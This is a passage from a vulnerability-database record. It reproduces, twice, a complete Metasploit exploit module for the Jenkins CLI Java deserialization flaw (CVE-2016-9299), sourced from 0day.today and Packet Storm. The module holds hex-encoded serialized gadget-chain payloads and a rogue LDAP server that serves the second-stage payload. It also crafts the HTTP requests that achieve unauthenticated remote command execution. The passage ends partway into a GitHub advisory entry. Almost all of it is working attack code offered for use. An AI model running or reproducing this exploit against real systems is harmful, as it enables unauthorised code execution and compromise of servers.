\"aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e42617369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78\"\r\n # java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf'\r\n STAGE2 = \"aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878\"\r\n \r\n SEARCH_REQUEST = 3\r\n SEARCH_RES_ENTRY = 4\r\n SEARCH_RES_DONE = 5\r\n ABANDON_REQUEST = 16\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\r\n the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not\r\n required to exploit this vulnerability.\r\n \r\n },\r\n 'Author' =>\r\n [\r\n 'Matthias Kaiser', # Original Vulnerability discovery\r\n 'Alisa Esage', # Private Exploit\r\n 'Ivan', # Metasploit Module Author\r\n 'YSOSerial' #Stage 2 payload\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['linux', 'unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [ [ 'Jenkins 2.31', {} ] ],\r\n 'References' =>\r\n [\r\n ['CVE', '2016-9299'],\r\n ['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'],\r\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'],\r\n ['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'],\r\n ['URL', 'https://github.com/frohoff/ysoserial']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n }\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 16 2016'\r\n ))\r\n \r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),\r\n Opt::RPORT('8080'),\r\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0\", '127.0.0.1' ]),\r\n OptPort.new('SRVPORT', [ true, \"The local port to listen on for the ldap server.\", 1389 ]),\r\n OptAddress.new('LDAPHOST', [ true, \"The ldap host the exploit will try to connect to \", '127.0.0.1' ])\r\n ])\r\n end\r\n \r\n def target_uri\r\n begin\r\n URI(datastore['TARGETURI'])\r\n rescue ::URI::InvalidURIError\r\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\r\n raise Msf::OptionValidateError.new(['TARGETURI'])\r\n end\r\n end\r\n \r\n def normalize_uri(*strs)\r\n new_str = strs * \"/\"\r\n \r\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\r\n \r\n # Makes sure there's a starting slash\r\n unless new_str[0,1] == '/'\r\n new_str = '/' + new_str\r\n end\r\n \r\n new_str\r\n end\r\n \r\n def aseq(x, tag)\r\n s = seq(x)\r\n s.tag_class = :APPLICATION\r\n s.tag = tag\r\n s\r\n end\r\n \r\n def seq(x)\r\n OpenSSL::ASN1::Sequence.new(x)\r\n end\r\n \r\n def int(x)\r\n OpenSSL::ASN1::Integer.new(x)\r\n end\r\n \r\n def string(x)\r\n OpenSSL::ASN1::OctetString.new(x)\r\n end\r\n \r\n def set(x)\r\n OpenSSL::ASN1::Set.new(x)\r\n end\r\n \r\n def enum(x)\r\n OpenSSL::ASN1::Enumerated.new(x)\r\n end\r\n \r\n \r\n def java_string(s)\r\n length = s.length\r\n \r\n packed_length = [length].pack(\"S>\")\r\n \r\n \"#{packed_length}#{s}\"\r\n end\r\n \r\n def search_res_done(message_id)\r\n s = seq([\r\n int(message_id),\r\n aseq([enum(0), string(\"\"), string(\"\")], SEARCH_RES_DONE)\r\n ])\r\n s.to_der\r\n end\r\n \r\n def make_stage2(command)\r\n [STAGE2].pack(\"H*\").gsub(\"\\x00\\x0Etouch /tmp/wtf\", java_string(command))\r\n end\r\n \r\n \r\n def make_stage2_reply(command, message_id)\r\n \r\n java_class_name_attributes = seq([string(\"javaClassName\"), set([string(\"WTF\")])])\r\n java_serialized_data_attributes = seq([string(\"javaSerializedData\"), set([string(make_stage2(command))])])\r\n attributes = seq([java_class_name_attributes, java_serialized_data_attributes])\r\n s = seq([\r\n int(message_id),\r\n aseq([string(\"cn=wtf, dc=example, dc=com\"), attributes], SEARCH_RES_ENTRY)])\r\n s.to_der\r\n end\r\n \r\n \r\n \r\n def make_stage1(ldap_url)\r\n [STAGE1].pack(\"H*\").gsub(\"\\x00\\x15ldap://localhost:1234\", java_string(ldap_url))\r\n end\r\n \r\n \r\n def read_ldap_packet(socket)\r\n \r\n buffer = \"\"\r\n \r\n bytes = socket.read(2)\r\n if bytes[0] != \"0\"\r\n raise \"NOT_LDAP: #{bytes.inspect} #{bytes[0]}\"\r\n end\r\n \r\n buffer << bytes\r\n \r\n length = bytes[1].ord\r\n if (length & (1<<7)) != 0\r\n length_bytes_length = length ^ (1<<7)\r\n \r\n length_bytes = socket.read(length_bytes_length)\r\n buffer << length_bytes\r\n length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}\r\n end\r\n \r\n buffer << socket.read(length)\r\n buffer\r\n end\r\n \r\n \r\n def write_chunk(socket, chunk)\r\n socket.write(chunk.bytesize.to_s(16) + \"\\r\\n\")\r\n socket.write(chunk)\r\n socket.write(\"\\r\\n\")\r\n end\r\n \r\n def exploit\r\n uuid = SecureRandom.uuid\r\n \r\n ldap_port = datastore[\"SRVPORT\"]\r\n ldap_host = datastore[\"SRVHOST\"]\r\n ldap_external_host = datastore[\"LDAPHOST\"]\r\n \r\n command = payload.encoded\r\n host = datastore[\"RHOST\"]\r\n \r\n ldap = TCPServer.new(ldap_host, ldap_port)\r\n \r\n cli_path = normalize_uri(target_uri.path, \"cli\")\r\n \r\n begin\r\n \r\n download = connect()\r\n \r\n begin\r\n \r\n download.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" +\r\n \"Host: #{host}\\r\\n\" +\r\n \"User-Agent: curl/7.36.0\\r\\n\" +\r\n \"Accept: */*\\r\\n\" +\r\n \"Session: #{uuid}\\r\\n\" +\r\n \"Side: download\\r\\n\" +\r\n \"Content-Length: 0\\r\\n\" +\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\\r\\n\")\r\n \r\n download.read(20)\r\n \r\n upload = connect()\r\n begin\r\n upload.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" +\r\n \"Host: #{host}\\r\\n\" +\r\n \"User-Agent: curl/7.36.0\\r\\n\" +\r\n \"Accept: */*\\r\\n\" +\r\n \"Session: #{uuid}\\r\\n\" +\r\n \"Side: upload\\r\\n\" +\r\n \"Content-type: application/octet-stream\\r\\n\" +\r\n \"Transfer-Encoding: chunked\\r\\n\\r\\n\")\r\n \r\n write_chunk(upload, \"<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\")\r\n write_chunk(upload, \"\\00\\00\\00\\00\")\r\n \r\n upload.flush\r\n \r\n stage1 = make_stage1(\"ldap://#{ldap_external_host}:#{ldap_port}\")\r\n \r\n chunk_header = [stage1.bytesize].pack(\"S>\")\r\n write_chunk(upload, chunk_header + stage1)\r\n \r\n upload.flush\r\n \r\n client = ldap.accept\r\n begin\r\n \r\n # this hardcodes an ldap conversation\r\n \r\n # read bindRequest\r\n read_ldap_packet(client)\r\n \r\n # write bindResponse\r\n client.write([\"300c02010161070a010004000400\"].pack(\"H*\"))\r\n \r\n # read searchRequest\r\n read_ldap_packet(client)\r\n \r\n # write searchResEntry\r\n client.write([\"3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61\"].pack(\"H*\"))\r\n \r\n # write searchResDone\r\n client.write(search_res_done(2))\r\n \r\n # read abandonReqeust or searchRequest\r\n bytes = read_ldap_packet(client)\r\n packet = OpenSSL::ASN1.decode(bytes)\r\n \r\n # abandonRequest packet is sometimes sent\r\n # so we distinguish between abandonRequest/searchRequest\r\n \r\n tag = packet.value[1].tag\r\n if tag == ABANDON_REQUEST\r\n \r\n bytes = read_ldap_packet(client)\r\n packet = OpenSSL::ASN1.decode(bytes)\r\n tag = packet.value[1].tag\r\n end\r\n \r\n if tag == SEARCH_REQUEST\r\n \r\n message_id = packet.value[0].value.to_int\r\n # write searchResEntry\r\n client.write(make_stage2_reply(command, message_id))\r\n \r\n # write searchResDone\r\n client.write(search_res_done(message_id))\r\n else\r\n raise \"Unexpected packet: #{tag}\"\r\n end\r\n \r\n client.flush\r\n ensure\r\n client.close\r\n end\r\n ensure\r\n upload.close\r\n end\r\n ensure\r\n download.close\r\n end\r\n \r\n ensure\r\n ldap.close\r\n end\r\n end\r\n \r\n def check\r\n result = Exploit::CheckCode::Safe\r\n \r\n begin\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n result\r\n end\r\n \r\n def vulnerable?\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n unless res\r\n fail_with(Failure::Unknown, 'The connection timed out.')\r\n end\r\n \r\n http_headers = res.headers\r\n \r\n http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= \"2.31\"\r\n end\r\n \r\n # Connects to the server, creates a request, sends the request,\r\n # reads the response\r\n #\r\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\r\n #\r\n def send_request_cgi(opts={}, timeout = 20)\r\n \r\n begin\r\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\r\n c.connect\r\n r = c.request_cgi(opts)\r\n c.send_recv(r, timeout)\r\n rescue ::Errno::EPIPE, ::Timeout::Error\r\n nil\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-05-18] #", "sourceHref": "https://0day.today/exploit/30370", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-05-17T17:16:34", "description": "", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "packetstorm", "title": "Jenkins CLI HTTP Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2018-05-16T00:00:00", "id": "PACKETSTORM:147665", "href": "https://packetstormsecurity.com/files/147665/Jenkins-CLI-HTTP-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nSTAGE1 = \"aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e42617369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78\" \n# java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf' \nSTAGE2 = \"aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878\" \n \nSEARCH_REQUEST = 3 \nSEARCH_RES_ENTRY = 4 \nSEARCH_RES_DONE = 5 \nABANDON_REQUEST = 16 \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on \nthe Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not \nrequired to exploit this vulnerability. \n \n}, \n'Author' => \n[ \n'Matthias Kaiser', # Original Vulnerability discovery \n'Alisa Esage', # Private Exploit \n'Ivan', # Metasploit Module Author \n'YSOSerial' #Stage 2 payload \n], \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => ARCH_CMD, \n'Targets' => [ [ 'Jenkins 2.31', {} ] ], \n'References' => \n[ \n['CVE', '2016-9299'], \n['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'], \n['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'], \n['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'], \n['URL', 'https://github.com/frohoff/ysoserial'] \n], \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd' \n} \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 16 2016' \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']), \nOpt::RPORT('8080'), \nOptAddress.new('SRVHOST', [ true, \"The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0\", '127.0.0.1' ]), \nOptPort.new('SRVPORT', [ true, \"The local port to listen on for the ldap server.\", 1389 ]), \nOptAddress.new('LDAPHOST', [ true, \"The ldap host the exploit will try to connect to \", '127.0.0.1' ]) \n]) \nend \n \ndef target_uri \nbegin \nURI(datastore['TARGETURI']) \nrescue ::URI::InvalidURIError \nprint_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\" \nraise Msf::OptionValidateError.new(['TARGETURI']) \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * \"/\" \n \nnew_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\") \n \n# Makes sure there's a starting slash \nunless new_str[0,1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef aseq(x, tag) \ns = seq(x) \ns.tag_class = :APPLICATION \ns.tag = tag \ns \nend \n \ndef seq(x) \nOpenSSL::ASN1::Sequence.new(x) \nend \n \ndef int(x) \nOpenSSL::ASN1::Integer.new(x) \nend \n \ndef string(x) \nOpenSSL::ASN1::OctetString.new(x) \nend \n \ndef set(x) \nOpenSSL::ASN1::Set.new(x) \nend \n \ndef enum(x) \nOpenSSL::ASN1::Enumerated.new(x) \nend \n \n \ndef java_string(s) \nlength = s.length \n \npacked_length = [length].pack(\"S>\") \n \n\"#{packed_length}#{s}\" \nend \n \ndef search_res_done(message_id) \ns = seq([ \nint(message_id), \naseq([enum(0), string(\"\"), string(\"\")], SEARCH_RES_DONE) \n]) \ns.to_der \nend \n \ndef make_stage2(command) \n[STAGE2].pack(\"H*\").gsub(\"\\x00\\x0Etouch /tmp/wtf\", java_string(command)) \nend \n \n \ndef make_stage2_reply(command, message_id) \n \njava_class_name_attributes = seq([string(\"javaClassName\"), set([string(\"WTF\")])]) \njava_serialized_data_attributes = seq([string(\"javaSerializedData\"), set([string(make_stage2(command))])]) \nattributes = seq([java_class_name_attributes, java_serialized_data_attributes]) \ns = seq([ \nint(message_id), \naseq([string(\"cn=wtf, dc=example, dc=com\"), attributes], SEARCH_RES_ENTRY)]) \ns.to_der \nend \n \n \n \ndef make_stage1(ldap_url) \n[STAGE1].pack(\"H*\").gsub(\"\\x00\\x15ldap://localhost:1234\", java_string(ldap_url)) \nend \n \n \ndef read_ldap_packet(socket) \n \nbuffer = \"\" \n \nbytes = socket.read(2) \nif bytes[0] != \"0\" \nraise \"NOT_LDAP: #{bytes.inspect} #{bytes[0]}\" \nend \n \nbuffer << bytes \n \nlength = bytes[1].ord \nif (length & (1<<7)) != 0 \nlength_bytes_length = length ^ (1<<7) \n \nlength_bytes = socket.read(length_bytes_length) \nbuffer << length_bytes \nlength = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e} \nend \n \nbuffer << socket.read(length) \nbuffer \nend \n \n \ndef write_chunk(socket, chunk) \nsocket.write(chunk.bytesize.to_s(16) + \"\\r\\n\") \nsocket.write(chunk) \nsocket.write(\"\\r\\n\") \nend \n \ndef exploit \nuuid = SecureRandom.uuid \n \nldap_port = datastore[\"SRVPORT\"] \nldap_host = datastore[\"SRVHOST\"] \nldap_external_host = datastore[\"LDAPHOST\"] \n \ncommand = payload.encoded \nhost = datastore[\"RHOST\"] \n \nldap = TCPServer.new(ldap_host, ldap_port) \n \ncli_path = normalize_uri(target_uri.path, \"cli\") \n \nbegin \n \ndownload = connect() \n \nbegin \n \ndownload.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" + \n\"Host: #{host}\\r\\n\" + \n\"User-Agent: curl/7.36.0\\r\\n\" + \n\"Accept: */*\\r\\n\" + \n\"Session: #{uuid}\\r\\n\" + \n\"Side: download\\r\\n\" + \n\"Content-Length: 0\\r\\n\" + \n\"Content-Type: application/x-www-form-urlencoded\\r\\n\\r\\n\") \n \ndownload.read(20) \n \nupload = connect() \nbegin \nupload.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" + \n\"Host: #{host}\\r\\n\" + \n\"User-Agent: curl/7.36.0\\r\\n\" + \n\"Accept: */*\\r\\n\" + \n\"Session: #{uuid}\\r\\n\" + \n\"Side: upload\\r\\n\" + \n\"Content-type: application/octet-stream\\r\\n\" + \n\"Transfer-Encoding: chunked\\r\\n\\r\\n\") \n \nwrite_chunk(upload, \"<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\") \nwrite_chunk(upload, \"\\00\\00\\00\\00\") \n \nupload.flush \n \nstage1 = make_stage1(\"ldap://#{ldap_external_host}:#{ldap_port}\") \n \nchunk_header = [stage1.bytesize].pack(\"S>\") \nwrite_chunk(upload, chunk_header + stage1) \n \nupload.flush \n \nclient = ldap.accept \nbegin \n \n# this hardcodes an ldap conversation \n \n# read bindRequest \nread_ldap_packet(client) \n \n# write bindResponse \nclient.write([\"300c02010161070a010004000400\"].pack(\"H*\")) \n \n# read searchRequest \nread_ldap_packet(client) \n \n# write searchResEntry \nclient.write([\"3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61\"].pack(\"H*\")) \n \n# write searchResDone \nclient.write(search_res_done(2)) \n \n# read abandonReqeust or searchRequest \nbytes = read_ldap_packet(client) \npacket = OpenSSL::ASN1.decode(bytes) \n \n# abandonRequest packet is sometimes sent \n# so we distinguish between abandonRequest/searchRequest \n \ntag = packet.value[1].tag \nif tag == ABANDON_REQUEST \n \nbytes = read_ldap_packet(client) \npacket = OpenSSL::ASN1.decode(bytes) \ntag = packet.value[1].tag \nend \n \nif tag == SEARCH_REQUEST \n \nmessage_id = packet.value[0].value.to_int \n# write searchResEntry \nclient.write(make_stage2_reply(command, message_id)) \n \n# write searchResDone \nclient.write(search_res_done(message_id)) \nelse \nraise \"Unexpected packet: #{tag}\" \nend \n \nclient.flush \nensure \nclient.close \nend \nensure \nupload.close \nend \nensure \ndownload.close \nend \n \nensure \nldap.close \nend \nend \n \ndef check \nresult = Exploit::CheckCode::Safe \n \nbegin \nif vulnerable? \nresult = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \nreturn Exploit::CheckCode::Unknown \nend \n \nresult \nend \n \ndef vulnerable? \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path) \n}) \nunless res \nfail_with(Failure::Unknown, 'The connection timed out.') \nend \n \nhttp_headers = res.headers \n \nhttp_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= \"2.31\" \nend \n \n# Connects to the server, creates a request, sends the request, \n# reads the response \n# \n# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. \n# \ndef send_request_cgi(opts={}, timeout = 20) \n \nbegin \nc = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) \nc.connect \nr = c.request_cgi(opts) \nc.send_recv(r, timeout) \nrescue ::Errno::EPIPE, ::Timeout::Error \nnil \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147665/jenkins_ldap_deserialize.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "github": [{"lastseen": "2023-01-27T05:06:55", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-14T01:00:43", "type": "github", "title": "Improper Neutralization of Special Elements used in an LDAP Query in Jenkins", 